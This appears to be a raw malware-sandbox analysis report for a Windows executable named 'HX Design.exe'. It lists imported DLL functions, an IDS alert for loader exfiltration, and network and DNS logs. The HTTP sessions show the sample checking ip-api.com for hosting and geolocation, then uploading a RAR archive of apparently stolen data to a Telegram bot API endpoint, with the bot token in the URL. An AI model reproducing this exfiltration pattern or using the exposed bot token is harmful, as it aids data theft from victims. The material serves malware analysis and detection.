                                                                                                                                                                                                                                                    KERNEL32.dllGetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
                                                                                                                                                                                                                                                    ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                                                                                                    GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW
                                                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                    2024-12-21T05:57:40.975494+01002857751ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST)1192.168.2.449760149.154.167.220443TCP
                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:10.413134098 CET4974180192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:10.532813072 CET8049741208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:10.532921076 CET4974180192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:10.533071995 CET4974180192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:10.652573109 CET8049741208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:11.630326033 CET8049741208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:11.631098032 CET4974180192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:11.751133919 CET8049741208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:11.751281023 CET4974180192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:24.605945110 CET49752443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:24.605984926 CET44349752142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:24.606093884 CET49752443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:24.606476068 CET49752443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:24.606487989 CET44349752142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:24.617696047 CET49753443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:24.617749929 CET44349753142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:24.624200106 CET49753443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:24.624200106 CET49753443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:24.624237061 CET44349753142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:25.451217890 CET49752443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:25.488158941 CET49753443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:37.887571096 CET4975980192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:38.007289886 CET8049759208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:38.007797956 CET4975980192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:38.011138916 CET4975980192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:38.130851030 CET8049759208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:39.175928116 CET8049759208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:39.227488041 CET4975980192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:39.539612055 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:39.539716959 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:39.539794922 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:39.565901995 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:39.565931082 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.970365047 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.971106052 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.971123934 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.972588062 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.972644091 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.974106073 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.974180937 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.974502087 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.974509001 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.974812984 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.974838972 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.975071907 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.975097895 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.975207090 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.975353956 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.975752115 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.975769997 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.975795984 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.975806952 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.975883007 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.975897074 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.975910902 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.975919962 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.975941896 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.975955009 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.976119995 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.976133108 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.976146936 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.976156950 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.976172924 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.976172924 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.976201057 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.976210117 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.976237059 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.976246119 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.976274967 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.976308107 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.976576090 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.976588964 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.976659060 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.976680040 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.976701975 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.976716042 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.976743937 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.976800919 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.976816893 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.976907969 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.976917028 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.976939917 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:40.993122101 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:41.019407034 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:41.025603056 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:41.025657892 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:41.025701046 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:41.025727987 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:41.025754929 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:41.025805950 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:41.025834084 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:41.025875092 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:41.025899887 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:41.027647972 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:41.039983988 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:41.071373940 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:41.071659088 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:41.071731091 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:41.071768999 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:41.071795940 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:41.086946964 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:41.115353107 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:41.315089941 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:41.315263033 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:41.315428019 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:41.436470032 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:43.158592939 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:43.158641100 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:43.158727884 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:43.158765078 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:43.159002066 CET44349760149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:43.159056902 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:43.159570932 CET49760443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:43.639930964 CET4975980192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:43.759963036 CET8049759208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:43.761975050 CET4975980192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:07.584387064 CET5159553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:07.800029039 CET53515951.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:10.267545938 CET6019853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:10.409399033 CET53601981.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:24.450159073 CET5609053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:24.586935997 CET53560901.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:37.738830090 CET5057953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:37.876954079 CET53505791.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:39.401442051 CET6144053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:39.538551092 CET53614401.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:07.584387064 CET192.168.2.41.1.1.10x877bStandard query (0)blank-zlvej.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:10.267545938 CET192.168.2.41.1.1.10xf59cStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:24.450159073 CET192.168.2.41.1.1.10xe9feStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:37.738830090 CET192.168.2.41.1.1.10x4ba1Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:39.401442051 CET192.168.2.41.1.1.10x62dStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                    Dec 21, 2024 05:56:56.273322105 CET1.1.1.1192.168.2.40x4cb7No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 21, 2024 05:56:56.273322105 CET1.1.1.1192.168.2.40x4cb7No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:07.800029039 CET1.1.1.1192.168.2.40x877bName error (3)blank-zlvej.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:10.409399033 CET1.1.1.1192.168.2.40xf59cNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:24.586935997 CET1.1.1.1192.168.2.40xe9feNo error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:37.876954079 CET1.1.1.1192.168.2.40x4ba1No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:39.538551092 CET1.1.1.1192.168.2.40x62dNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    • api.telegram.org
                                                                                                                                                                                                                                                    • ip-api.com
                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    0192.168.2.449741208.95.112.1807524C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:10.533071995 CET117OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                                                                                                    Host: ip-api.com
                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                    User-Agent: python-urllib3/2.2.3
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:11.630326033 CET175INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Sat, 21 Dec 2024 04:57:10 GMT
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Content-Length: 6
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    X-Ttl: 60
                                                                                                                                                                                                                                                    X-Rl: 44
                                                                                                                                                                                                                                                    Data Raw: 66 61 6c 73 65 0a
                                                                                                                                                                                                                                                    Data Ascii: false


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    1192.168.2.449759208.95.112.1807524C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:38.011138916 CET116OUTGET /json/?fields=225545 HTTP/1.1
                                                                                                                                                                                                                                                    Host: ip-api.com
                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                    User-Agent: python-urllib3/2.2.3
                                                                                                                                                                                                                                                    Dec 21, 2024 05:57:39.175928116 CET381INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Sat, 21 Dec 2024 04:57:38 GMT
                                                                                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                    Content-Length: 204
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    X-Ttl: 60
                                                                                                                                                                                                                                                    X-Rl: 44
                                                                                                                                                                                                                                                    Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                                                    Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    0192.168.2.449760149.154.167.2204437524C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-21 04:57:40 UTC268OUTPOST /bot7941165298:AAE-cxddvAA5WE9BKSZYSVJTX3zwZRZqwIw/sendDocument HTTP/1.1
                                                                                                                                                                                                                                                    Host: api.telegram.org
                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                    Content-Length: 677534
                                                                                                                                                                                                                                                    User-Agent: python-urllib3/2.2.3
                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=96c8c802dc2959601b7d52be2a215a8e
                                                                                                                                                                                                                                                    2024-12-21 04:57:40 UTC16384OUTData Raw: 2d 2d 39 36 63 38 63 38 30 32 64 63 32 39 35 39 36 30 31 62 37 64 35 32 62 65 32 61 32 31 35 61 38 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 ad 08 77 18 21 04 00 00 01 0f 53 a3 2e 6c 0a 8c a6 31 64 23 9d ab 3c 0d 72 a5 19 ca 3c 72 d7 a7 cf 61 f1 9d 0d 83 99 c8 31 cf 54 ed 5f 4d 57 01 75 b6 87 96 c4 91 3f 23 50 92 68 1e f6 c3 3d e8 71 c4 cb 84 eb 11 e6 b9 8e cf f4 1a 63 71 6c e2 36 6e e5 55 6f 62 91 78 74 b0 03 09
                                                                                                                                                                                                                                                    Data Ascii: --96c8c802dc2959601b7d52be2a215a8eContent-Disposition: form-data; name="document"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!w!S.l1d#<r<ra1T_MWu?#Ph=qcql6nUobxt
                                                                                                                                                                                                                                                    2024-12-21 04:57:40 UTC16384OUTData Raw: c4 3f f7 f7 1d 17 dd 05 39 96 52 a0 28 9d 9a 96 2e 19 15 c2 2c 15 0c 4c be d9 86 89 2b 5f 2e b8 18 c4 00 08 e2 60 cf 26 ba cd b2 a8 fe 61 22 22 ba dc ce 59 fd ac 79 db 92 7a 14 29 f8 e7 99 96 24 17 db e3 ed ea 79 1c 13 70 48 02 4a 1a 7d d6 55 43 39 c8 9d c8 98 a1 fa 51 5b 54 e3 a5 6d 94 ef 0b e5 9d 49 01 43 57 3c da df 88 d8 80 65 c4 67 dd b3 94 14 4d bc d6 c9 dd d5 60 75 da 0c d8 d6 e8 37 f2 2e 76 0d 2a 08 e3 8b f0 d7 80 31 8c d9 e0 bd eb 23 95 5a 56 63 cb b6 84 f8 0e 7e c8 f8 b4 18 4d 9b 10 d1 f0 27 c3 e5 b8 c1 12 39 98 40 27 70 5a 84 d5 11 4c e8 0b 07 31 3c ff b4 dc 8f b1 b3 df 4e 2b 04 d5 4b 44 86 b8 d4 3d e8 29 64 56 c2 74 7c 65 24 1b 62 a5 aa 8a e5 70 f6 04 65 4c 49 48 56 5d 4f 16 11 63 a0 d4 fb 40 c2 98 79 e5 55 8b 2f a4 5a 34 0d 81 2e 9c 7f 78 2a
                                                                                                                                                                                                                                                    Data Ascii: ?9R(.,L+_.`&a""Yyz)$ypHJ}UC9Q[TmICW<egM`u7.v*1#ZVc~M'9@'pZL1<N+KD=)dVt|e$bpeLIHV]Oc@yU/Z4.x*
                                                                                                                                                                                                                                                    2024-12-21 04:57:40 UTC16384OUTData Raw: 67 9c f0 f2 c0 d5 06 17 29 93 15 3e a7 a8 a9 c4 ee 2f c5 28 05 a8 43 f0 5d 53 74 fa 23 7c 1f 7c 0d f0 e3 32 b5 4d f8 d1 ae 71 a3 04 06 4b 08 de cb b1 2a 0f 19 af bc dc 57 a6 1a 41 0b 41 34 3c 34 84 50 18 80 bf 06 3f 0e 92 9a de f7 89 63 0b a2 4e 94 fe ab 5c b1 e7 98 ee a9 cb c8 27 b5 4e 5a d9 9c 64 d9 5d 06 26 f4 53 7a 29 3b 0a 04 70 ed 18 3c 1a 80 d4 15 18 81 97 5f 51 83 d0 32 13 7f 7f f0 6f be 87 82 32 af a8 b2 79 e6 1a c5 c6 29 d7 9b 9a 8d 0a b0 c1 66 2f ab 58 d3 1f 51 58 6b e5 d5 a4 c5 f4 26 51 cd 8b 6a 63 66 5b cb e4 4f f4 38 c8 77 40 bc 37 eb 01 fa 8c 5f be 3b 01 0c c6 1c 58 ce 8d 98 74 48 a3 dd a6 5b f9 c0 91 1d 29 a6 e8 5f 20 02 4f 88 b5 44 71 bb 0d 0d db 66 de 1e 41 62 64 af bb cc 04 fd 7f 42 5b cc d6 4f b8 07 ef e9 82 4c e7 53 e5 99 07 da 94 e6
                                                                                                                                                                                                                                                    Data Ascii: g)>/(C]St#||2MqK*WAA4<4P?cN\'NZd]&Sz);p<_Q2o2y)f/XQXk&Qjcf[O8w@7_;XtH[)_ ODqfAbdB[OLS
                                                                                                                                                                                                                                                    2024-12-21 04:57:40 UTC16384OUTData Raw: 65 65 61 79 1e b6 e8 32 e1 fc 7c 35 10 b1 e9 d9 70 ff 4a f5 a3 73 5d e4 37 1c 26 78 23 36 e8 52 f6 e7 bc ec bc 37 9a 6b b1 f8 65 a8 63 04 99 0e c3 ac c9 34 a6 fe cd 35 bf 5c 39 13 b8 ea 4d 3f d0 10 b9 1d 08 be 4b c7 fb 8b cc 49 78 b2 85 28 1f e8 0c c2 14 94 08 f1 b8 00 26 ec 6c 1c 23 f1 73 f2 78 39 be 28 99 2e 13 4b 3e 67 09 fe ac 0b 72 25 5f f7 08 5a 76 e2 7a c4 f9 18 3c c4 85 9c 9d 5a 1a 1f a3 4d 16 32 e7 52 8b 39 6d 9f 02 68 47 3d 46 51 c7 4e 4a 07 1c 1f c0 55 60 8a d8 1e c4 6b 25 c1 c7 db a7 8e a4 60 e2 ae 53 26 e3 78 74 19 67 3b ef 2e 29 3f 54 43 0c 4d 04 0a 45 0c b7 16 6e 34 b1 1a 29 21 88 a0 ee 63 12 94 dc 7c a0 30 19 54 fa 2f c2 b7 7b 4f 2a 32 5e d9 18 8d 6a 8c b6 b8 32 f7 2e d4 42 b5 e6 d5 63 fa ca 8e 4a 1e a9 f0 fe de e7 29 ba 46 12 5d 0f d6 05
                                                                                                                                                                                                                                                    Data Ascii: eeay2|5pJs]7&x#6R7kec45\9M?KIx(&l#sx9(.K>gr%_Zvz<ZM2R9mhG=FQNJU`k%`S&xtg;.)?TCMEn4)!c|0T/{O*2^j2.BcJ)F]
